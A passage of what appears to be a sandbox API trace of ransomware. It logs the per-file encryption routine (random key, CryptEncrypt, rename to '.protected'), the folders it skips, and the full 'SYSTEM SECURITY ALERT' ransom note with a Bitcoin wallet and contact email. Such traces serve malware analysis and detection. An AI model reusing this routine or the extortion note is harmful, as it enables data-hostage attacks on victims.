Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.908] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.908] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.909] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.909] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.909] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.909] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.909] CloseHandle (hObject=0x164) returned 1 [0079.910] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0079.910] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi") returned 143 [0079.910] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0079.910] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0079.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*") returned 145 [0079.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.910] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.910] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.910] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.910] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.910] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\.") returned 145 [0079.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.910] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.911] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.911] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.911] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.911] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.911] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\..") returned 146 [0079.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.911] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.911] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.911] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.911] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.911] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.911] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.912] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.912] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.912] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.912] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.913] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.913] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.913] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.913] CloseHandle (hObject=0x168) returned 1 [0079.913] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.protected") returned 167 [0079.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.protected")) returned 1 [0079.914] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.914] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.914] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\RESTORE_FILES.txt") returned 161 [0079.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.914] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.914] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.915] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.915] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.915] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.915] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.915] CloseHandle (hObject=0x164) returned 1 [0079.915] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0079.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN") returned 146 [0079.915] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0079.915] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0079.915] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*") returned 148 [0079.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\.") returned 148 [0079.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\..") returned 149 [0079.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.916] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.917] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.917] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.917] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.917] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.917] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.917] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.917] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.918] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.918] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.918] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.918] CloseHandle (hObject=0x168) returned 1 [0079.918] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.protected") returned 170 [0079.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0079.919] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.919] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.919] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 164 [0079.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\RESTORE_FILES.txt" 